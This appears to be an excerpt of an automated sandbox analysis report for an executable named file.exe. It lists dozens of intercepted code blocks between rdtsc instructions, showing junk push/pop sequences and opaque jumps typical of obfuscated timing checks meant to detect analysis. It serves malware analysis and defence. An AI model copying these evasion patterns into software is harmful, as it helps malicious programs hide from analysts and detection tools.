Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E41BC5 second address: E41BD1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ebx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC40CA second address: FC411A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F7451925Bh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jc 00007F2F74519270h 0x00000012 jmp 00007F2F74519264h 0x00000017 jc 00007F2F74519256h 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 jmp 00007F2F74519267h 0x00000025 push edi 0x00000026 pop edi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC428B second address: FC429B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F74D592FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC429B second address: FC42BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F2F74519265h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6744 second address: FC6765 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2F74D592F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F2F74D592FEh 0x00000010 pop ecx 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6765 second address: FC6778 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2F74519256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnp 00007F2F74519256h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC67B8 second address: FC6823 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2F74D592F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F2F74D592F8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 or di, 2039h 0x0000002b jng 00007F2F74D592FCh 0x00000031 mov esi, dword ptr [ebp+122D398Eh] 0x00000037 push 00000000h 0x00000039 mov dword ptr [ebp+122D19FAh], eax 0x0000003f mov edx, dword ptr [ebp+122D37AAh] 0x00000045 call 00007F2F74D592F9h 0x0000004a push edx 0x0000004b jmp 00007F2F74D59300h 0x00000050 pop edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6823 second address: FC6832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6832 second address: FC6837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6837 second address: FC683D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC683D second address: FC68D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F2F74D59308h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007F2F74D592FAh 0x00000018 pop eax 0x00000019 add dword ptr [ebp+122D21B3h], edi 0x0000001f push 00000003h 0x00000021 mov dword ptr [ebp+122D1A13h], eax 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007F2F74D592F8h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 jmp 00007F2F74D59301h 0x00000048 jmp 00007F2F74D592FCh 0x0000004d push 00000003h 0x0000004f mov esi, 552BF5FCh 0x00000054 call 00007F2F74D592F9h 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c push edx 0x0000005d pop edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC68D0 second address: FC68DD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2F74519256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC68DD second address: FC68E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC68E9 second address: FC68EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC68EE second address: FC6932 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2F74D59302h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 jns 00007F2F74D592F6h 0x00000016 jmp 00007F2F74D59308h 0x0000001b popad 0x0000001c pushad 0x0000001d jbe 00007F2F74D592F6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6932 second address: FC697E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F2F7451925Eh 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jmp 00007F2F7451925Dh 0x00000016 pop eax 0x00000017 mov esi, dword ptr [ebp+122D1B2Dh] 0x0000001d lea ebx, dword ptr [ebp+124584FBh] 0x00000023 jng 00007F2F74519263h 0x00000029 jmp 00007F2F7451925Dh 0x0000002e push eax 0x0000002f push ecx 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC69F5 second address: FC69F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6AF6 second address: FC6B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F2F74519258h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6B09 second address: FC6B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6B0F second address: FC6B42 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jnc 00007F2F74519267h 0x00000013 push ecx 0x00000014 jno 00007F2F74519256h 0x0000001a pop ecx 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6B42 second address: FC6B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F74D59300h 0x00000009 popad 0x0000000a pop edx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push edx 0x00000010 jns 00007F2F74D592FCh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov edx, dword ptr [ebp+122D3822h] 0x0000001e lea ebx, dword ptr [ebp+12458506h] 0x00000024 cmc 0x00000025 xchg eax, ebx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push esi 0x0000002a pop esi 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6B7E second address: FC6BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2F74519260h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2F74519267h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6BB1 second address: FC6BB7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE68A4 second address: FE68A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE6B75 second address: FE6B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE6B79 second address: FE6B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE6B7F second address: FE6B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE6CD5 second address: FE6CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE721C second address: FE7224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE731F second address: FE7363 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F74519268h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007F2F74519258h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F2F7451925Dh 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jo 00007F2F74519256h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE7363 second address: FE7375 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F74D592FEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE7375 second address: FE7386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2F7451925Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE7527 second address: FE7543 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F2F74D592F6h 0x0000000e jmp 00007F2F74D592FEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE79EE second address: FE79F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE79F4 second address: FE79FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FECB50 second address: FECB54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF2E49 second address: FF2E4E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF33B5 second address: FF33BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF34ED second address: FF34F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF34F1 second address: FF34F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF34F5 second address: FF34FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF4C08 second address: FF4C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF50AB second address: FF50B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF527B second address: FF5280 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5280 second address: FF529C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2F74D59301h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5926 second address: FF593D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2F74519263h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5B18 second address: FF5B2A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2F74D592F8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5CD9 second address: FF5CE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5DBF second address: FF5DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5DC5 second address: FF5DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5DC9 second address: FF5DCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF5DCD second address: FF5DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F2F74519258h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF6024 second address: FF6047 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2F74D59307h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF6047 second address: FF6051 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2F74519256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF6051 second address: FF6057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF6057 second address: FF605B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF659C second address: FF65A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF65A2 second address: FF65A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF70EB second address: FF70EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF70EF second address: FF716C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2F7451925Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push ecx 0x0000000e jno 00007F2F74519258h 0x00000014 pop ecx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F2F74519258h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 or esi, 41B4314Fh 0x00000036 jne 00007F2F74519257h 0x0000003c push 00000000h 0x0000003e movzx edi, ax 0x00000041 mov dword ptr [ebp+122D215Ah], edi 0x00000047 push 00000000h 0x00000049 mov dword ptr [ebp+122D1A0Eh], eax 0x0000004f xchg eax, ebx 0x00000050 js 00007F2F74519278h 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F2F74519266h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF716C second address: FF7193 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2F74D592F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F2F74D59307h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF802F second address: FF8034 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF80DB second address: FF80E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F2F74D592F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF88A9 second address: FF88C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F74519268h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF9403 second address: FF9415 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F2F74D592F6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF9415 second address: FF9419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFA1A0 second address: FFA1F2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 je 00007F2F74D592FEh 0x0000000e jns 00007F2F74D592F8h 0x00000014 push 00000000h 0x00000016 mov esi, ebx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F2F74D592F8h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 xchg eax, ebx 0x00000035 pushad 0x00000036 jng 00007F2F74D592FCh 0x0000003c jns 00007F2F74D592F6h 0x00000042 push eax 0x00000043 push edx 0x00000044 push esi 0x00000045 pop esi 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFAC7F second address: FFAC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB72D second address: FFB745 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F74D59304h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB745 second address: FFB7C7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2F74519258h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sub dword ptr [ebp+1248638Fh], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F2F74519258h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f ja 00007F2F7451925Fh 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007F2F74519258h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 xchg eax, ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F2F74519261h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFB4CB second address: FFB4D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD64F second address: FFD653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD653 second address: FFD663 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F74D592FAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD663 second address: FFD66C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD66C second address: FFD679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD679 second address: FFD67D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD67D second address: FFD6AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F74D59307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2F74D59304h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD6AE second address: FFD6B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD6B2 second address: FFD6B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD6B8 second address: FFD6C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jbe 00007F2F74519256h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100040C second address: 1000410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1000410 second address: 1000432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2F74519268h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10025A2 second address: 10025AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F2F74D592F6h 0x0000000a rdtsc
